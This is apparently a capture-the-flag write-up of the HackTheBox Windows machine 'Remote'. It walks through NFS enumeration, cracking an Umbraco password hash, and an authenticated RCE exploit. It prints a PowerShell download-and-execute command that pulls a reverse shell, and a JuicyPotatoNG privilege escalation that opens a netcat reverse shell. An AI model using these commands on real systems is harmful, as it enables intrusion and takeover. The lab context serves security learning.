Remote Writeup

10 March 2023 #CTF #HTB #box #easy #windows

remote info


We will remotely run nmap:

$ sudo nmap -n -Pn -sCV -oN enum/initial.nmap
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-07T21:41:14
|_  start_date: N/A


nmap tells us we can login anonymously so let's check it out:

$ ftp anonymous@
ftp> ls -a
229 Entering Extended Passive Mode (|||49683|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> put test.txt
550 Access is denied.

There's nothing and we can't upload stuff so it seems like a dead end.


Let's try our luck with SMB now:

$ smbclient -NL
session setup failed: NT_STATUS_ACCESS_DENIED
$ rpcclient -U %
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

No access for us ...


We can use the showmount command to check for available 'shares':

$ showmount -e
Export list for
/site_backups (everyone)

There's a /site_backups share and anyone (everyone) can access it. We just need to mount it:

$ mkdir site_backups
$ sudo mount -t nfs ./site_backups

Like the name suggests, it is a backup of the web app running on port 80. After digging through some files, we find out it is using Umbraco which is a .NET CMS. We can get the specifc version in Web.config:

<add key="umbracoConfigurationStatus" value="7.12.4" />

This version is vulnerable to an authenticated RCE. (exploit script here)


Now that we have a clear path to get code execution on the box, we still need to find some creds to access Umbraco.

After (again) a bit of research, we find out the passwords are stored in a file called Umbraco.sdf (in the App_Data directory) which is a database file used with Microsoft SQL Server.

I couldn't view this file nicely on a Windows VM with the extension for Visual Studio and even LINQPad. Luckily, we can still use the good old strings technique:

$ strings Umbraco.sdf

After (painfully) going through the output, we see this interesting line which seems to be a row of a table with username, email and password hash. It is even nice enough to tell us that this is a raw SHA1 hash. We can just throw it to hashcat:

$ hashcat -m 100 b8be16afba8c314ad33d812f22a04991b90e2aaa /usr/share/wordlists/rockyou.txt

It cracks pretty quickly. We'll test it on the website to make sure it works:

umbraco login

It indeed works (make sure to use the email address to login), we get access to the Umbraco dashboard. This means we can use the exploit script and get code execution:

$ python -u 'admin@htb.local' -p 'baconandcheese' -i -c powershell -a "IEX(New-Object Net.WebClient).downloadString('')"

We're using powershell to request a nishang reverse shell from our HTTP server hosted with python -m http.server.


Since we exploited a service account, we most likely have the SeImpersonatePrivilege privilege:

PS C:\windows\system32\inetsrv> whoami /priv


Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We do. This means we can probably use one of the potato exploits to escalate to NT AUTHORITY\SYSTEM. We'll use this repo.

First, we'll create a SMB share that contains the juicy potato binary as well as nc.exe:

$ ls
JuicyPotatoNG.exe  nc.exe
$ impacket-smbserver -smb2support public $PWD

To access our share from the reverse shell on the target, we'll use the net use command:

PS C:\> net use \\\public
The command completed successfully.

This is the command that got me a reverse shell:

PS C:\programdata> \\\public\JuicyPotatoNG.exe -t * -p cmd.exe -a '/c C:\programdata\nc.exe 1337 -e cmd.exe'

I had to copy nc.exe to the local filesystem because for some reason it didn't work when trying to use it from the share.

Key Takeaways